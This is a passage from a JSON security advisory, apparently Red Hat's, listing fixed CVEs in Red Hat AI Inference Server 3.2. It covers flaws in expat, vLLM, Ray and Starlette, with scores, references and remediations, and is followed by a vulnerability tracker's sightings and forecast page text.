"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-59375"
},
{
"category": "external",
"summary": "RHBZ#2395108",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-59375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59375"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-59375",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59375"
},
{
"category": "external",
"summary": "https://www.mozilla.org/security/advisories/mfsa2026-22/#CVE-2025-59375",
"url": "https://www.mozilla.org/security/advisories/mfsa2026-22/#CVE-2025-59375"
},
{
"category": "external",
"summary": "https://www.mozilla.org/security/advisories/mfsa2026-24/#CVE-2025-59375",
"url": "https://www.mozilla.org/security/advisories/mfsa2026-24/#CVE-2025-59375"
}
],
"release_date": "2025-09-15T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "To mitigate the issue, limit XML input size and complexity before parsing, and avoid accepting compressed or deeply nested XML. Use OS-level resource controls (like ulimit or setrlimit()) to cap memory usage, or run the parser in a sandboxed or isolated process with strict memory and CPU limits. This helps prevent denial-of-service by containing excessive resource consumption.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "firefox: thunderbird: expat: libexpat in Expat allows attackers to trigger large dynamic memory allocations via a small document that is submitted for parsing"
},
{
"cve": "CVE-2025-59425",
"cwe": {
"id": "CWE-208",
"name": "Observable Timing Discrepancy"
},
"discovery_date": "2025-09-22T06:45:41.577000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2397234"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in vLLM\u2019s API token authentication logic, where token comparisons were not performed in constant time. This weakness could allow an attacker to exploit timing differences to guess valid tokens and bypass authentication.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vllm: Timing Attack in vLLM API Token Verification Leading to Authentication Bypass",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The RedHat security team has rated the severity of this issue as Important. The vulnerability is remotely exploitable without authentication or user interaction and can result in authentication bypass. The root cause was the use of a non-constant-time string comparison, which leaked timing information. Successful exploitation could lead to unauthorized access to APIs and sensitive resources.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-59425"
},
{
"category": "external",
"summary": "RHBZ#2397234",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2397234"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-59425",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59425"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-59425",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59425"
},
{
"category": "external",
"summary": "https://github.com/vllm-project/vllm/commit/ee10d7e6ff5875386c7f136ce8b5f525c8fcef48",
"url": "https://github.com/vllm-project/vllm/commit/ee10d7e6ff5875386c7f136ce8b5f525c8fcef48"
},
{
"category": "external",
"summary": "https://github.com/vllm-project/vllm/security/advisories/GHSA-wr9h-g72x-mwhm",
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-wr9h-g72x-mwhm"
}
],
"release_date": "2025-10-07T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "vllm: Timing Attack in vLLM API Token Verification Leading to Authentication Bypass"
},
{
"cve": "CVE-2025-62593",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2025-11-26T23:01:25.307125+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2417394"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Ray\u2019s HTTP API endpoint handling (e.g. /api/jobs, /api/job_agent/jobs/), which allows a remote attacker to trigger arbitrary code execution when a developer using Ray visits a malicious website in a vulnerable browser (e.g. Firefox or Safari). The root cause is an insufficient defense relying solely on the User-Agent header starting with \u201cMozilla\u201d, which can be manipulated under the fetch specification \u2014 enabling a DNS-rebinding attack to bypass browser-based protections.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ray: Ray is vulnerable to RCE via Safari \u0026 Firefox Browsers through DNS Rebinding Attack",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat has chosen to keep this as Important instead of Critical severity because the successful exploitation of this vulnerability requires user interaction in conjunction with a DNS rebinding attack.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-62593"
},
{
"category": "external",
"summary": "RHBZ#2417394",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2417394"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-62593",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62593"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62593",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62593"
},
{
"category": "external",
"summary": "https://github.com/ray-project/ray/commit/70e7c72780bdec075dba6cad1afe0832772bfe09",
"url": "https://github.com/ray-project/ray/commit/70e7c72780bdec075dba6cad1afe0832772bfe09"
},
{
"category": "external",
"summary": "https://github.com/ray-project/ray/security/advisories/GHSA-q279-jhrf-cc6v",
"url": "https://github.com/ray-project/ray/security/advisories/GHSA-q279-jhrf-cc6v"
}
],
"release_date": "2025-11-26T22:28:28.577000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ray: Ray is vulnerable to RCE via Safari \u0026 Firefox Browsers through DNS Rebinding Attack"
},
{
"cve": "CVE-2025-62727",
"cwe": {
"id": "CWE-407",
"name": "Inefficient Algorithmic Complexity"
},
"discovery_date": "2025-10-28T21:01:03.833849+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2406929"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service vulnerability has been discovered in the python Starlette framework. an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This induces CPU exhaustion per request, causing a denial\u2011of\u2011service for endpoints serving files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "starlette: Starlette DoS via Range header merging",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-62727"
},
{
"category": "external",
"summary": "RHBZ#2406929",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2406929"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-62727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62727"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62727",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62727"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5",
"url": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
}
],
"release_date": "2025-10-28T20:14:53.655000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "starlette: Starlette DoS via Range header merging"
},
{
"cve": "CVE-2025-66448",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2025-12-01T23:01:07.198041+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418152"
}
],
"notes": [
{
"category": "description",
"text": "A remote code execution vulnerability has been identified in vLLM. An attacker can exploit a weakness in the model loading process to silently fetch and run unauthorized, malicious Python code on the host system. This happens because the engine mistakenly executes code from a remote repository referenced in a model\u0027s configuration, even when explicit security measures are set to prevent it.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vllm: vLLM: Remote Code Execution via malicious model configuration",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Important for Red Hat because vLLM, when deployed in a Red Hat environment, is susceptible to remote code execution. An attacker can craft a malicious model configuration that, when loaded, fetches and executes arbitrary Python code from a remote repository, even if `trust_remote_code` is explicitly set to `False`.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-66448"
},
{
"category": "external",
"summary": "RHBZ#2418152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-66448",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66448"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-66448",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66448"
},
{
"category": "external",
"summary": "https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86",
"url": "https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86"
},
{
"category": "external",
"summary": "https://github.com/vllm-project/vllm/pull/28126",
"url": "https://github.com/vllm-project/vllm/pull/28126"
},
{
"category": "external",
"summary": "https://github.com/vllm-project/vllm/security/advisories/GHSA-8fr4-5q9j-m8gm",
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-8fr4-5q9j-m8gm"
}
],
"release_date": "2025-12-01T22:45:42.566000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "vllm: vLLM: Remote Code Execution via malicious model configuration"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…